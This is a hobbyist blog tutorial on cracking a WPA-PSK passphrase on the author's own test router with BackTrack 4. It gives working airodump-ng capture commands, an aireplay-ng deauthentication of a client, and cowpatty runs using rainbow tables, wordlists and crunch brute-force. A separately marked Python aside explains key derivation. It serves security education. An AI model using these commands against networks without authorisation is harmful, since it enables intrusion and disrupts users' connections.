A Samsung N110, pretty sweet, and I actually did go for the Windows XP OS; whatever you say about Windows, it is usually handy to have, and when I need Linux I'll just boot up the live USB.
The only small gripe I have is that the BIOS does not allow booting from an SD card, which is kinda annoying, but I have a tiny 8 gig USB drive, so it's OK. It's just that the eeePC seemed to be more versatile out of the box.. oh well, no worries, it works!
When BT4 is finalised I'll probably do a dual-boot HDD install, but I'm waiting with that for the moment :)
So anyway, back on track to backtrack ..
In previous posts I looked at wireless and WEP encrypted networks, and at how the WEP networks especially are dangerously weak.
That was all done with BackTrack 3 Final.
Important to note: everything below uses BackTrack 4 Pre Final.
Now it is time to look at WPA and WPA2 protected networks, which are normally the ones you will see the most.
I have set up a test network using my Asus router as follows;
essid : default
Encryption : WPA-PSK
No MAC filtering
DHCP enabled
So the point of this is to demonstrate the problems with people using weak passwords for their WPA encrypted connections.
For this example we will use Cowpatty, which is a program made to crack WPA(2) passwords using either rainbow tables or simple wordlists.
Granted this does not catch all, but it can catch the incautious.
The advantage of using rainbow tables is that it is much faster (when you actually have the tables, that is..); just using a wordlist means the program has to combine the essid with the passphrase, create a hash out of these two and see if it is OK.
Rainbow tables already have these hashes pre-computed, so they save that time.
Some rainbow tables have already been made using some of the most commonly seen essids, built from a 49 million word dictionary for use with Cowpatty; http://www.offensive-security.com/wpa-tables/
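To make the essid + passphrase hashing concrete, here is an added example of my own (not code from the post, from Cowpatty or from the table makers) of how WPA/WPA2-PSK derives the Pairwise Master Key; the ESSID 'my-own-ssid' is made up. It shows why a table is tied to one network name, which is also why a non-default essid and a long passphrase defeat precomputed tables.

```python
import hashlib

# WPA/WPA2-PSK turns an ESSID and a passphrase into the 256-bit Pairwise
# Master Key (PMK) per IEEE 802.11i: PBKDF2-HMAC-SHA1 over the passphrase,
# with the ESSID as salt, 4096 iterations, 32 bytes of output.
# The ESSID salt is the reason a precomputed table is only valid for one
# network name, and why the linked tables cover only the most common essids.

PBKDF2_ROUNDS = 4096
PMK_LEN = 32


def wpa_pmk(essid: str, passphrase: str) -> bytes:
    """Return the PMK for this ESSID/passphrase pair."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def table_reusable(essid_a: str, essid_b: str, passphrase: str) -> bool:
    """True only if a table built for essid_a would also cover essid_b,
    i.e. both ESSIDs yield the same PMK for the same passphrase."""
    return wpa_pmk(essid_a, passphrase) == wpa_pmk(essid_b, passphrase)


if __name__ == "__main__":
    # Published test vector (IEEE 802.11i Annex H): passphrase "password" on SSID "IEEE".
    print(wpa_pmk("IEEE", "password").hex())
    # Same passphrase, router-default essid vs. a renamed one ('my-own-ssid' is made up):
    # different PMKs, so a table made for 'default' is useless against the renamed network.
    print(table_reusable("default", "my-own-ssid", "butterfly"))
```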
So what we need to do is the following;
> Identify our target network
> Verify if any clients are associated to the network
> If no clients are associated.. wait..
> If clients are associated, deauth and capture the 4-way handshake
> Use this 4-way handshake with cowpatty to crack the network's WPA password.
Identifying target
Start our interface in monitor mode and start up airodump; since I know my network will be a WPA network on channel 1, I start airodump with filters for those;
airmon-ng
airmon-ng start wlan0
airodump-ng mon0 -c 1 -t WPA
And then we see the target we are looking to attack.
So after having identified the network I am after, I re-start airodump specifying the bssid, start monitoring and writing data (in this case using 'default' as the filename to write to), and wait for a client to connect.
airodump-ng mon0 -c 1 -t WPA --bssid 00:13:D4:09:32:60 -w default
When the 4-way handshake is captured after the client associates (see top right of the picture below) I no longer need airodump and can continue.
If there is already a client connected to the AP, we need to deauth the client and force it to reconnect, thus giving us the 4-way handshake we need.
In a separate console;
aireplay-ng mon0 -0 5 -a 00:13:D4:09:32:60 -c 00:1F:3C:8C:D9:71
Now we need to have the WPA rainbow table handy for this crack, so use the link above for rainbow tables or make your own..
Start up cowpatty and enter information as necessary.
(Everything below is my specific info; change it to suit your needs.)
In this case (in the cowpatty console);
./cowpatty -d /media/disk/WPA_tables/default.wpa -r ~/default-01.cap -s default
When starting;
When done;
So as you can see from the above pic, the passphrase is butterfly and the program managed to go through over 45000 passwords per second.. pretty good!
Doing the exact same crack, but just using the dictionary file from which the rainbow tables were made, the situation only changes when starting up cowpatty.
You still need the handshake with the AP and the essid, then proceed as follows; (in my case my wordlist is in the folder /media/disk/WORDLISTS/)
./cowpatty -f /media/disk/WORDLISTS/wpalist.txt -r ~/default-01.cap -s default
I didn't have the patience to let it run its course.. it was only doing 34 passphrases a second and that would have taken a looong time! However, given time and patience.. a lot can be done.
Remember this was done on a Samsung N110 with 2 gig RAM; if the cracking were done on a different/better setup, the speed would be better.
It is also possible to brute-force the passphrase using crunch and piping the output through cowpatty.
For instance, there is a telecom provider here that issued a WPA key along with its router that was always a combination of numbers and upper case characters up to F, 8 characters in length.
In that case, if we were to feel patient.. we could run crunch using the known variables and pipe the outcome to cowpatty as follows;
/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid
I can do something similar in my case using 'buterfly' as the character set (since those are all the distinct characters in the passphrase) and, to speed things up, fixing the first 5 characters;
/pentest/passwords/crunch/./crunch 9 9 buterfly -t butte@@@@ | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/default-01.cap -s default -v